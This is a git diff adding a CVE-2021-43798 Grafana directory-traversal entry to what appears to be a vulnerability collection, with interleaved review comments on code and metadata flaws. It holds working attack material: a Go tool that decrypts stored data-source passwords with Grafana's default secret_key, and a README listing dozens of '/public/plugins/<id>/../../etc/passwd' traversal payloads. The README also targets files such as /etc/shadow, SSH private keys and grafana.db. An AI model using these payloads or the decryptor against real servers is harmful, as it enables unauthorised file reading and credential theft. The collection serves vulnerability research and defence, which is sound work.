diff --git a/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go b/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go
new file mode 100644
index 0000000000000000000000000000000000000000..60f6f67c5d45110683f4ce6cfee67ca0f71a443f
--- /dev/null
+++ b/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go
@@ -0,0 +1,183 @@
+package main
+
+import (
+ "bytes"
+ "crypto/aes"
+ "crypto/cipher"
+ "crypto/rand"
+ "crypto/sha256"
+ "encoding/base64"
+ "errors"
+ "fmt"
+ "golang.org/x/crypto/pbkdf2"
+ "io"
+)
+
+const (
+ saltLength = 8
+ aesCfb = "aes-cfb"
+ aesGcm = "aes-gcm"
+ encryptionAlgorithmDelimiter = '*'
+)
+
+func deriveEncryptionAlgorithm(payload []byte) (string, []byte, error) {
+ if len(payload) == 0 {
+ return "", nil, fmt.Errorf("unable to derive encryption algorithm")
+ }
+
+ if payload[0] != encryptionAlgorithmDelimiter {
+ return aesCfb, payload, nil // backwards compatibility
+ }
+
+ payload = payload[1:]
+ algDelim := bytes.Index(payload, []byte{encryptionAlgorithmDelimiter})
+ if algDelim == -1 {
+ return aesCfb, payload, nil // backwards compatibility
+ }
+
+ algB64 := payload[:algDelim]
+ payload = payload[algDelim+1:]
+
+ alg := make([]byte, base64.RawStdEncoding.DecodedLen(len(algB64)))
+
+ _, err := base64.RawStdEncoding.Decode(alg, algB64)
+ if err != nil {
+ return "", nil, err
+ }
+
+ return string(alg), payload, nil
+}
+
+func decryptGCM(block cipher.Block, payload []byte) ([]byte, error) {
+ gcm, err := cipher.NewGCM(block)
+ if err != nil {
+ return nil, err
+ }
+
+ nonce := payload[saltLength : saltLength+gcm.NonceSize()]
+ ciphertext := payload[saltLength+gcm.NonceSize():]
+ return gcm.Open(nil, nonce, ciphertext, nil)
+}
+
+// Key needs to be 32bytes
+func encryptionKeyToBytes(secret, salt string) ([]byte, error) {
+ return pbkdf2.Key([]byte(secret), []byte(salt), 10000, 32, sha256.New), nil
+}
+
+func decryptCFB(block cipher.Block, payload []byte) ([]byte, error) {
+ // The IV needs to be unique, but not secure. Therefore it's common to
+ // include it at the beginning of the ciphertext.
+ if len(payload) < aes.BlockSize {
+ return nil, errors.New("payload too short")
+ }
+
+ iv := payload[saltLength : saltLength+aes.BlockSize]
+ payload = payload[saltLength+aes.BlockSize:]
+ payloadDst := make([]byte, len(payload))
+
+ stream := cipher.NewCFBDecrypter(block, iv)
+
+ // XORKeyStream can work in-place if the two arguments are the same.
+ stream.XORKeyStream(payloadDst, payload)
+ return payloadDst, nil
+}
+
+func Decrypt(payload []byte, secret string) ([]byte, error) {
+ alg, payload, err := deriveEncryptionAlgorithm(payload)
+ if err != nil {
+ return nil, err
+ }
+
+ if len(payload) < saltLength {
+ return nil, fmt.Errorf("unable to compute salt")
+ }
+ salt := payload[:saltLength]
+ key, err := encryptionKeyToBytes(secret, string(salt))
+ if err != nil {
+ return nil, err
+ }
+
+ block, err := aes.NewCipher(key)
+ if err != nil {
+ return nil, err
+ }
+
+ switch alg {
+ case aesGcm:
+ return decryptGCM(block, payload)
+ default:
+ return decryptCFB(block, payload)
+ }
+}
+
+// Encrypt encrypts a payload with a given secret.
+// DEPRECATED. Do not use it.
+// Use secrets.Service instead.
+func Encrypt(payload []byte, secret string) ([]byte, error) {
+ salt, err := GetRandomString(saltLength)
+ if err != nil {
+ return nil, err
+ }
+
+ key, err := encryptionKeyToBytes(secret, salt)
+ if err != nil {
+ return nil, err
+ }
+ block, err := aes.NewCipher(key)
+ if err != nil {
+ return nil, err
+ }
+
+ // The IV needs to be unique, but not secure. Therefore it's common to
+ // include it at the beginning of the ciphertext.
+ ciphertext := make([]byte, saltLength+aes.BlockSize+len(payload))
+ copy(ciphertext[:saltLength], salt)
+ iv := ciphertext[saltLength : saltLength+aes.BlockSize]
+ if _, err := io.ReadFull(rand.Reader, iv); err != nil {
+ return nil, err
+ }
+
+ stream := cipher.NewCFBEncrypter(block, iv)
+ stream.XORKeyStream(ciphertext[saltLength+aes.BlockSize:], payload)
+
+ return ciphertext, nil
+}
+
+// GetRandomString generate random string by specify chars.
+// source: https://github.com/gogits/gogs/blob/9ee80e3e5426821f03a4e99fad34418f5c736413/modules/base/tool.go#L58
+func GetRandomString(n int, alphabets ...byte) (string, error) {
+ const alphanum = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
+ var bytes = make([]byte, n)
+ if _, err := rand.Read(bytes); err != nil {
+ return "", err
+ }
+
+ for i, b := range bytes {
+ if len(alphabets) == 0 {
+ bytes[i] = alphanum[b%byte(len(alphanum))]
+ } else {
+ bytes[i] = alphabets[b%byte(len(alphabets))]
+ }
+ }
+ return string(bytes), nil
+}
+
+func main() {
+ // decode base64str
+ var grafanaIni_secretKey = "SW2YcwTIb9zpOOhoPsMm"
+ var dataSourcePassword = "R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q=="
+ encrypted, _ := base64.StdEncoding.DecodeString(dataSourcePassword)
+ PwdBytes, _ := Decrypt(encrypted, grafanaIni_secretKey)
+ fmt.Println("[*] grafanaIni_secretKey= " + grafanaIni_secretKey)
+ fmt.Println("[*] DataSourcePassword= " + dataSourcePassword)
+ fmt.Println("[*] plainText= " + string(PwdBytes))
+
+ fmt.Println("\n")
+ // encode str (dataSourcePassword)
+ var PlainText = "jas502n"
+ encryptedByte, _ := Encrypt([]byte(PlainText), grafanaIni_secretKey)
+ var encryptedStr = base64.StdEncoding.EncodeToString(encryptedByte)
+ fmt.Println("[*] grafanaIni_secretKey= " + grafanaIni_secretKey)
+ fmt.Println("[*] PlainText= " + PlainText)
+ fmt.Println("[*] EncodePassword= " + encryptedStr)
+}
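Review bot: Both decrypt helpers slice `payload` beyond the length that has been checked, so a truncated or corrupted ciphertext panics instead of returning an error. In `decryptCFB` the guard compares against `aes.BlockSize` only, while the slices after it need `saltLength+aes.BlockSize` bytes; it should read `if len(payload) < saltLength+aes.BlockSize {`. `decryptGCM` has no guard at all and needs `if len(payload) < saltLength+gcm.NonceSize() { return nil, errors.New("payload too short") }` before the nonce slice. `main` also discards the errors from `DecodeString` and `Decrypt`, and because CFB is unauthenticated a wrong `secret_key` produces garbage bytes rather than an error, so the printed `plainText` should not be read as proof that the key matched.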
diff --git a/cve/Grafana/2021/CVE-2021-43798/README.md b/cve/Grafana/2021/CVE-2021-43798/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..9deca6f25d7d4d1eaacbd5914abb52b3071209f7
--- /dev/null
+++ b/cve/Grafana/2021/CVE-2021-43798/README.md
@@ -0,0 +1,336 @@
+# CVE-2021-43798 Grafana Unauthorized arbitrary file reading vulnerability
+
+8.3.1 (2021-12-07) Security: Fixes **CVE-2021-43798** . For more information, see our blog
+
+https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
+
+
+
+
+
+
+### Example: get db password
+
+`/var/lib/grafana/grafana.db`
+
+
+
+加盐密码明文验证
+https://github.com/grafana/grafana/blob/985c61d7008211e0fbee7d095bf3424adf71b4ac/pkg/util/encoding.go
+
+
+
+```golang
+package main
+
+import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+ "golang.org/x/crypto/pbkdf2"
+)
+
+// EncodePassword encodes a password using PBKDF2.
+func EncodePassword(password string, salt string) string {
+ newPasswd := pbkdf2.Key([]byte(password), []byte(salt), 10000, 50, sha256.New)
+ return hex.EncodeToString(newPasswd)
+}
+
+func main() {
+ fmt.Println(EncodePassword("admin", "F3FAxVm33R"))
+}
+
+
+```
+
+
+
+Config `/etc/grafana/grafana.ini`
+
+```
+bash-5.1$ ps -ef |grep grafana
+ 1 grafana 0:35 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:default.paths.logs=/var/log/grafana cfg:default.paths.plugins=/var/lib/grafana/plugins cfg:default.paths.provisioning=/etc/grafana/provisioning
+```
+
+
+### Ensure encryption of data source secrets
+
+Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default. Existing data source will keep working with unencrypted passwords. If you want to migrate to encrypted storage for your existing data sources you can do that by:
+
+- For data sources created through UI, you need to go to data source config, re-enter the password or basic auth password and save the data source.
+- For data sources created by provisioning, you need to update your config file and use secureJsonData.password or secureJsonData.basicAuthPassword field. See [provisioning docs]({{< relref "../administration/provisioning" >}}) for example of current configuration.
+
+https://github.com/grafana/grafana/blob/main/pkg/util/encryption.go
+
+
+
+#### decode password
+
+例如: 从数据库`/var/lib/grafana/grafana.db`获得数据源密文 `R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==` ,通过读取 `/etc/grafana/grafana.ini` 中的 `secret_key` (default: SW2YcwTIb9zpOOhoPsMm),进行解密
+
+```
+$ go run AESDecrypt.go
+[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
+[*] DataSourcePassword= R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
+[*] plainText= jas502n
+
+```
+
+#### encode password
+例如: 将明文密码`jas502n`通过key,加密成密文
+
+```
+[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
+[*] PlainText= jas502n
+[*] EncodePassword= QWhMOFdNZkqW6bx9YM0dPHMjzInsvycQXgMmMfFqpA==
+```
+
+### other attack
+
+```
+/conf/defaults.ini
+/etc/grafana/grafana.ini
+/etc/passwd
+/etc/shadow
+/home/grafana/.bash_history
+/home/grafana/.ssh/id_rsa
+/root/.bash_history
+/root/.ssh/id_rsa
+/usr/local/etc/grafana/grafana.ini
+/var/lib/grafana/grafana.db
+/proc/net/fib_trie
+/proc/net/tcp
+/proc/self/cmdline
+```
+
+```
+Default plugins count: 40
+Successful count: 48
+```
+[Bypass grafana nginx Proxy error 400 ](https://articles.zsxq.com/id_baeb9hmiroq5.html)
+
+https://twitter.com/chybeta/status/1468410745264041992
+
+
+```
+/public/plugins/alertGroups/../../../../../../../../etc/passwd
+/public/plugins/alertlist/../../../../../../../../etc/passwd
+/public/plugins/alertmanager/../../../../../../../../etc/passwd
+/public/plugins/annolist/../../../../../../../../etc/passwd
+/public/plugins/barchart/../../../../../../../../etc/passwd
+/public/plugins/bargauge/../../../../../../../../etc/passwd
+/public/plugins/canvas/../../../../../../../../etc/passwd
+/public/plugins/cloudwatch/../../../../../../../../etc/passwd
+/public/plugins/dashboard/../../../../../../../../etc/passwd
+/public/plugins/dashlist/../../../../../../../../etc/passwd
+/public/plugins/debug/../../../../../../../../etc/passwd
+/public/plugins/elasticsearch/../../../../../../../../etc/passwd
+/public/plugins/gauge/../../../../../../../../etc/passwd
+/public/plugins/geomap/../../../../../../../../etc/passwd
+/public/plugins/gettingstarted/../../../../../../../../etc/passwd
+/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
+/public/plugins/grafana/../../../../../../../../etc/passwd
+/public/plugins/graph/../../../../../../../../etc/passwd
+/public/plugins/graphite/../../../../../../../../etc/passwd
+/public/plugins/heatmap/../../../../../../../../etc/passwd
+/public/plugins/histogram/../../../../../../../../etc/passwd
+/public/plugins/influxdb/../../../../../../../../etc/passwd
+/public/plugins/jaeger/../../../../../../../../etc/passwd
+/public/plugins/live/../../../../../../../../etc/passwd
+/public/plugins/logs/../../../../../../../../etc/passwd
+/public/plugins/loki/../../../../../../../../etc/passwd
+/public/plugins/mixed/../../../../../../../../etc/passwd
+/public/plugins/mssql/../../../../../../../../etc/passwd
+/public/plugins/mysql/../../../../../../../../etc/passwd
+/public/plugins/news/../../../../../../../../etc/passwd
+/public/plugins/nodeGraph/../../../../../../../../etc/passwd
+/public/plugins/opentsdb/../../../../../../../../etc/passwd
+/public/plugins/piechart/../../../../../../../../etc/passwd
+/public/plugins/pluginlist/../../../../../../../../etc/passwd
+/public/plugins/postgres/../../../../../../../../etc/passwd
+/public/plugins/prometheus/../../../../../../../../etc/passwd
+/public/plugins/stat/../../../../../../../../etc/passwd
+/public/plugins/state-timeline/../../../../../../../../etc/passwd
+/public/plugins/status-history/../../../../../../../../etc/passwd
+/public/plugins/table-old/../../../../../../../../etc/passwd
+/public/plugins/table/../../../../../../../../etc/passwd
+/public/plugins/tempo/../../../../../../../../etc/passwd
+/public/plugins/testdata/../../../../../../../../etc/passwd
+/public/plugins/text/../../../../../../../../etc/passwd
+/public/plugins/timeseries/../../../../../../../../etc/passwd
+/public/plugins/welcome/../../../../../../../../etc/passwd
+/public/plugins/xychart/../../../../../../../../etc/passwd
+/public/plugins/zipkin/../../../../../../../../etc/passwd
+```
+
+# 0x0 Default plugins installed (40) list:
+
+http://x.x.x.x:3000/api/plugins?embedded=0
+
+```
+alertlist
+annolist
+grafana-azure-monitor-datasource
+barchart
+bargauge
+cloudwatch
+dashlist
+elasticsearch
+gauge
+geomap
+gettingstarted
+stackdriver
+graph
+graphite
+heatmap
+histogram
+influxdb
+jaeger
+logs
+loki
+mssql
+mysql
+news
+nodeGraph
+opentsdb
+piechart
+pluginlist
+postgres
+prometheus
+stat
+state-timeline
+status-history
+table
+table-old
+tempo
+testdata
+text
+timeseries
+welcome
+zipkin
+```
+
+
+# 0x01 /usr/share/grafana/public/app/plugins/datasource ( 21)
+
+```
+/usr/share/grafana/public/app/plugins/datasource
+
+bash-5.1$ ls -l
+drwxr-xr-x 3 root root 4096 Oct 7 10:55 alertmanager
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 cloud-monitoring
+drwxr-xr-x 8 root root 4096 Oct 7 10:55 cloudwatch
+drwxr-xr-x 2 root root 4096 Oct 7 10:55 dashboard
+drwxr-xr-x 9 root root 4096 Oct 7 10:55 elasticsearch
+drwxr-xr-x 3 root root 4096 Oct 7 10:55 grafana
+drwxr-xr-x 19 root root 4096 Oct 7 10:55 grafana-azure-monitor-datasource
+drwxr-xr-x 9 root root 4096 Oct 7 10:55 graphite
+drwxr-xr-x 6 root root 4096 Oct 7 10:55 influxdb
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 jaeger
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 loki
+drwxr-xr-x 2 root root 4096 Oct 7 10:55 mixed
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 mssql
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 mysql
+drwxr-xr-x 6 root root 4096 Oct 7 10:55 opentsdb
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 postgres
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 prometheus
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 tempo
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 testdata
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 zipkin
+```
+Fuzz Successful!
+
+
+```
+/public/plugins/alertmanager/../../../../../../../../etc/passwd
+/public/plugins/cloudwatch/../../../../../../../../etc/passwd
+/public/plugins/dashboard/../../../../../../../../etc/passwd
+/public/plugins/elasticsearch/../../../../../../../../etc/passwd
+/public/plugins/grafana/../../../../../../../../etc/passwd
+/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
+/public/plugins/graphite/../../../../../../../../etc/passwd
+/public/plugins/influxdb/../../../../../../../../etc/passwd
+/public/plugins/jaeger/../../../../../../../../etc/passwd
+/public/plugins/loki/../../../../../../../../etc/passwd
+/public/plugins/mixed/../../../../../../../../etc/passwd
+/public/plugins/mssql/../../../../../../../../etc/passwd
+/public/plugins/mysql/../../../../../../../../etc/passwd
+/public/plugins/opentsdb/../../../../../../../../etc/passwd
+/public/plugins/postgres/../../../../../../../../etc/passwd
+/public/plugins/prometheus/../../../../../../../../etc/passwd
+/public/plugins/tempo/../../../../../../../../etc/passwd
+/public/plugins/testdata/../../../../../../../../etc/passwd
+/public/plugins/zipkin/../../../../../../../../etc/passwd
+```
+
+# 0x02 /usr/share/grafana/public/app/plugins/ (29)
+
+```
+/usr/share/grafana/public/app/plugins/panel/
+
+drwxr-xr-x 2 root root 4.0K Oct 7 10:55 alertGroups
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 alertlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 annolist
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 barchart
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 bargauge
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 canvas
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 dashlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 debug
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 gauge
+drwxr-xr-x 8 root root 4.0K Oct 7 10:55 geomap
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 gettingstarted
+drwxr-xr-x 5 root root 4.0K Oct 7 10:55 graph
+drwxr-xr-x 5 root root 4.0K Oct 7 10:55 heatmap
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 histogram
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 live
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 logs
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 news
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 nodeGraph
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 piechart
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 pluginlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 stat
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 state-timeline
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 status-history
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 table
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 table-old
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 text
+drwxr-xr-x 6 root root 4.0K Oct 7 10:55 timeseries
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 welcome
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 xychart
+```
+
+
+Fuzz Success
+
+```
+/public/plugins/alertGroups/../../../../../../../../etc/passwd
+/public/plugins/alertlist/../../../../../../../../etc/passwd
+/public/plugins/annolist/../../../../../../../../etc/passwd
+/public/plugins/barchart/../../../../../../../../etc/passwd
+/public/plugins/bargauge/../../../../../../../../etc/passwd
+/public/plugins/canvas/../../../../../../../../etc/passwd
+/public/plugins/dashlist/../../../../../../../../etc/passwd
+/public/plugins/debug/../../../../../../../../etc/passwd
+/public/plugins/gauge/../../../../../../../../etc/passwd
+/public/plugins/geomap/../../../../../../../../etc/passwd
+/public/plugins/gettingstarted/../../../../../../../../etc/passwd
+/public/plugins/graph/../../../../../../../../etc/passwd
+/public/plugins/heatmap/../../../../../../../../etc/passwd
+/public/plugins/histogram/../../../../../../../../etc/passwd
+/public/plugins/live/../../../../../../../../etc/passwd
+/public/plugins/logs/../../../../../../../../etc/passwd
+/public/plugins/news/../../../../../../../../etc/passwd
+/public/plugins/nodeGraph/../../../../../../../../etc/passwd
+/public/plugins/piechart/../../../../../../../../etc/passwd
+/public/plugins/pluginlist/../../../../../../../../etc/passwd
+/public/plugins/stat/../../../../../../../../etc/passwd
+/public/plugins/state-timeline/../../../../../../../../etc/passwd
+/public/plugins/status-history/../../../../../../../../etc/passwd
+/public/plugins/table/../../../../../../../../etc/passwd
+/public/plugins/table-old/../../../../../../../../etc/passwd
+/public/plugins/text/../../../../../../../../etc/passwd
+/public/plugins/timeseries/../../../../../../../../etc/passwd
+/public/plugins/welcome/../../../../../../../../etc/passwd
+/public/plugins/xychart/../../../../../../../../etc/passwd
+```
+
diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..6580d144188b424c6454b72efa75c6b32853e90a
--- /dev/null
+++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
@@ -0,0 +1,19 @@
+id: CVE-2021-43798
+source: https://github.com/jas502n/Grafana-CVE-2021-43798
+info:
+ name: Grafana 是一个用于监控和可观测性的开源平台。
+ severity: high
+ description: |
+ Grafana 是一个用于监测和可观测性的开源平台。Grafana 版本8.0.0-beta1到8.3.0(打了补丁的版本除外)容易受到目录遍历的影响,允许访问本地文件。易受攻击的 URL 路径是:`/public/plugins//`,这里是所有已安装插件的插件 ID。建议用户升级到打了补丁的版本8.0.7、8.1.8、8.2.7或8.3.1。GitHub 安全咨询包含有关易受攻击的URL路径、缓解和公开时间表的更多信息。
+ scope-of-influence:
+ grafana:8.0.0-8.3.0
+ reference:
+ - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-43798
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: CVE2021, grafana
\ No newline at end of file
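Review bot: The vulnerable path in `description` reads `/public/plugins//`, so the plugin-ID placeholder the next clause refers to has been lost (most likely stripped as an HTML tag); it should be `/public/plugins/<plugin-id>/`. `info.name` holds a one-line description of Grafana rather than the name of the vulnerability, so something like `name: Grafana directory traversal / arbitrary file read` would match the entry's purpose. `scope-of-influence: grafana:8.0.0-8.3.0` is also looser than the description, which says 8.0.0-beta1 through 8.3.0 excluding the patched 8.0.7, 8.1.8 and 8.2.7 releases; anyone triaging from this field alone would flag patched hosts as affected. The file also lacks a trailing newline.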
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 34ec4afd0b0d7c012e35fcdb4915f75d7844514e..8d72f1e8e4d4c1ac10e6cd3bcb302c53e377ecae 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -144,6 +144,8 @@ cve:
- CVE-2022-0824
Zimbra:
- CVE-2022-27925
+ Grafana:
+ - CVE-2021-43798
cnvd:
apache-tomcat:
- CNVD-2020-10487